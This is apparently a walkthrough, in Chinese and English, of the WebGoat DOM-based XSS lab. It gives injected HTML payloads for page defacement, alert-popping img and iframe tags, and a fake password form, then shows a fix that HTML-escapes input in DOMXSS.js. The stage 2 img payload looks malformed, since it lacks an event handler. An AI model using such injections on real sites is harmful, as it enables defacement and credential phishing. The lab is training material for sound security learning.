1、STAGE 1: For this exercise, your mission is to deface this website using the image at the following location: OWASP IMAGE---使用image標籤,輸入owasp image的路徑
2、 STAGE 2: Now, try to create a JavaScript alert using the image tag
使用image tag進行彈框
3、STAGE 3: Next, try to create a JavaScript alert using the IFRAME tag.
使用iframe標籤進行彈框
4、
STAGE 4: Use the following to create a fake login form:
Please enter your password:<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
5、STAGE 5: Perform client-side HTML entity encoding to mitigate the DOM XSS vulnerability. A utility method is provided for you in escape.js.
解題思路
步驟一:
- 找到題目中要提交的owasp image照片路徑,由於在一個大路徑webgoat下,所以將路徑images/logos/owasp.jpg拷貝
- 提交<img src="/images/logos/owasp.jpg">,完成
步驟二:
- 使用image標籤彈框: '"><img src=x alert("xss")>
步驟三:
- 使用<iframe src="javascript:alert('xss');"></iframe>
步驟四:
-直接複製,使用
- Please enter your password:<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
步驟五:修復
- 找到js路徑,find -name DOMXSS.js
/.extract/webapps/WebGoat/plugin_extracted/plugin/DOMXSS/js/DOMXSS.js
- 修改爲:
- function displayGreeting(name) {
if (name != ''){
document.getElementById("greeting").innerHTML="Hello, " + *** escapeHTML(name); *** + "!";
}
}
原來爲:
document.getElementById("greeting").innerHTML="Hello, " + name + "!";